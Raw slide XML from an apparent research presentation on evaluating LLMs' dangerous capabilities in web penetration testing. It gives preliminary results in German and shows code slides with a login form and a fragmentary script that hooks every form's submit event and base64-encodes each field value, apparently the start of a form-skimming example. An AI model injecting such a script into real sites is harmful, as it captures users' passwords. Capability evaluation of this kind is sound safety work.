          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10452484" y="6545129"/>
            <a:ext cx="1268078" cy="268247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137549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EB5D6-8CEE-A5C9-38DB-A1D34E516C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8F036BC-9944-D3B2-DE0E-F3FE9FF2C750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686474" y="487656"/>
            <a:ext cx="10799999" cy="864000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Dangerous Capability Evaluation of LLMs for</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Web Penetration Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>(Reinsperger, 2025Q3)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Textplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B2645FC-4224-B9A3-FEF6-FD0EB75FD3B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="2" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="DA291C"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="2400" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(Vorläufige Ergebnisse)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" marR="0" lvl="2" indent="-266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="DA291C"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Stark nachlassende Erfolge bei steigender Komplexität</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" marR="0" lvl="2" indent="-266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="DA291C"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Fehlerrate hoch, aber Selbstkorrektur möglich!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" marR="0" lvl="2" indent="-266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="DA291C"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="A1 Sans"/>
              </a:rPr>
              <a:t>Große Unterschiede zwischen LLMs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" marR="0" lvl="2" indent="-266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="DA291C"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Flexibilität und „Verständnis“ von LLMs bringt Mehrwert</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Grafik 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE2BB2AE-83E1-6B37-2D31-A1B3C47012AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10480550" y="6545129"/>
            <a:ext cx="1268078" cy="268247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="670461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DC615-5F84-F434-8B75-725BAD831E45}"/>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38E5A20E-8E3B-87E4-2D13-7631D5E364BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10480550" y="6545129"/>
            <a:ext cx="1268078" cy="268247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F866B634-2DF3-DF7C-E064-D21D5F15F7EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696000" y="2667144"/>
            <a:ext cx="10709663"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&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="007020"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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document</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.querySelectorAll</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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'form'</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forEach</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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="007020"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>form</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rgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;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tx1"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</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form</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.addEventListener</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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'submit'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rgbClr val="007020"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>event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rgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;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tx1"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		</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Array</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.from</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form</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.elements</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forEach</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el</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rgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;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endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007020"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e</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l</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.value</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rgbClr val="333333"/>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toBase64(</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el</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.value</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tx1"/>
                </a:solidFill>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tx1"/>
                </a:solidFill>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p>
          <a:p>
            <a:pPr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endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007700"/>
              </a:solidFill>
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAf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&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="54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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{661B64A8-DF47-B816-64BC-D4239F5859BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696000" y="512708"/>
            <a:ext cx="9323065"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&lt;form</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method=</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"POST"</a:t>
            </a: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	&lt;input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type=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"text"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name=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"username"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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	&lt;input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type=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"password"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name=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"password"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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	&lt;input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type=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"submit"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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&lt;/form&gt;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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91760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075CC-9522-D4C9-B61E-3F9925ABE902}"/>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84E05DC1-E357-E00F-CAAF-8B107D5E4EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10480550" y="6545129"/>
            <a:ext cx="1268078" cy="268247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91641DD8-38B4-7B69-AA6B-E95E48505041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696000" y="2667144"/>
            <a:ext cx="10709663"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&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="007020"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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document</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.querySelectorAll</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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'form'</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forEach</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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="007020"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>form</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rgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;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tx1"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</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form</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.addEventListener</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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'submit'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rgbClr val="007020"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>event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rgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;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tx1"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		</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Array</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.from</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form</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.elements</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forEach</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el</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rgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;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endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007020"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e</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l</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.value</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rgbClr val="333333"/>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toBase64(</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el</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.value</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tx1"/>
                </a:solidFill>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tx1"/>
                </a:solidFill>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p>
          <a:p>
            <a:pPr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endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007700"/>
              </a:solidFill>
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAf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&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="54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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C1A0C7A-BFC8-E8CF-F374-00EC092DB37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696000" y="512708"/>
            <a:ext cx="9323065"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&lt;form</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method=</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"POST"</a:t>
            </a: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	&lt;input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type=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"text"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name=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"username"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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	&lt;input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type=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"password"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name=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"password"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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	&lt;input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type=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"submit"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B06090200000200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&lt;/form&gt;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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rechteck 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E2C11B8-6A46-8875-BB02-1047D989477E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531878" y="440668"/>
            <a:ext cx="10980620" cy="3121933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">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sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rechteck 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D624BBA-6131-8F8D-C82B-F294C3EBD88F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531878" y="4821580"/>
            <a:ext cx="10980620" cy="1723549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">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sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rechteck 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C15C7A-9BEB-1B1A-53DB-7A418EB2F5E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513561" y="3947069"/>
            <a:ext cx="4106275" cy="490043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">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sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rechteck 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF2331D3-ADA6-6EE3-0C79-6E93B7E6ECA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
